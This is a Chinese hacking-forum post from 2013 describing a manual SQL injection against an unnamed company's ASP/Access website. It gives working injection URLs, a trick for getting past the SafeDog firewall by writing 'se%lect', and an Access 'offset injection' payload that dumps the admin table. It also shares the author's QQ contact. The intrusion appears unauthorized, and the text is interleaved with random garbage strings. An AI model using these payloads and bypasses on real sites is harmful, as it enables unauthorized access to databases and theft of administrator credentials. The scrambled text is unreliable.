找回密码
 立即注册
查看: 3026|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
: g& N9 i7 y( W8 n
  M6 W" }5 b$ o. W5 a, l' M+ t- q" g! j9 Q' ~7 O& [
顺手加个admin
" F2 g8 G5 \6 j2 c& \* C; F
# @$ t  N# i. `5 w  ^- U+ ^# b) b1 ^/ {$ n' O
默认后台。: v) H; G- c& l7 d* J" D) [
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
: ]$ r* R; d5 ^: V3 D3 b: v
! Y- ~# @- b- q5 ]  [, R1 g/ H8 ]7 h9 ~9 a6 L
0 _" Z& s8 y9 A$ n1 q
所以就不用御剑扫了,待会直接封IP。6 j6 ]. Q2 l# w1 b

$ Q) R/ D% J: {8 E' l# p用order by语句判断是否存在注入。- n; h* ~8 f( M! D% p& d. r
http://www.xxx.com /product_show.asp?id=997 order by 1
' ]6 Z7 q7 ~$ c- f& x& O" O9 A( [http://www.xxx.com /product_show.asp?id=997 order by 100
/ k* H8 t( L& y' t$ A# p) J! R现在存在注入,经测试后发现是9个字段。
2 y1 G9 E+ ]6 t$ _0 {! w " a" p3 t$ N7 Y4 a
接下来进行联合查询,猜是否存在admin表。
2 g+ r( W; b! ?  [# whttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
: z& D* T# u0 Z2 m& ?7 C8 g
& p- U  @1 v5 E; W5 y/ }
1 Q4 T  H0 x: ]% Q$ {( o& d7 r! F8 U4 I8 z: ]1 \
在select中间加个%,se%lect绕过安全狗。1 `8 q9 o+ N5 K2 Q

7 b, q7 U6 d% }$ X
3 Y% {" ^4 {( J" \7 }0 I. L8 g发现存在admin表,然后开始手工猜常用的字段。
* r! V; v' p% }/ j纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
' T( W3 }0 F7 n; }
( }5 q8 c2 c& f1 _突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。8 u! H) Q) @6 u2 X
) K- b# m% U2 k4 K' I8 v0 [- d
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
' q8 [7 f. K8 Y3 O, e" L3 `http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin+ t$ q6 ?" i7 i3 J& Z
好了,敏感内容出显了。​
% `) M  P: t4 Q1 H1 p
* n/ {* V/ l8 a" a0 f' m- C' ?6 o; r$ c1 x$ e  v/ h
6 O/ x! \" Q; j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表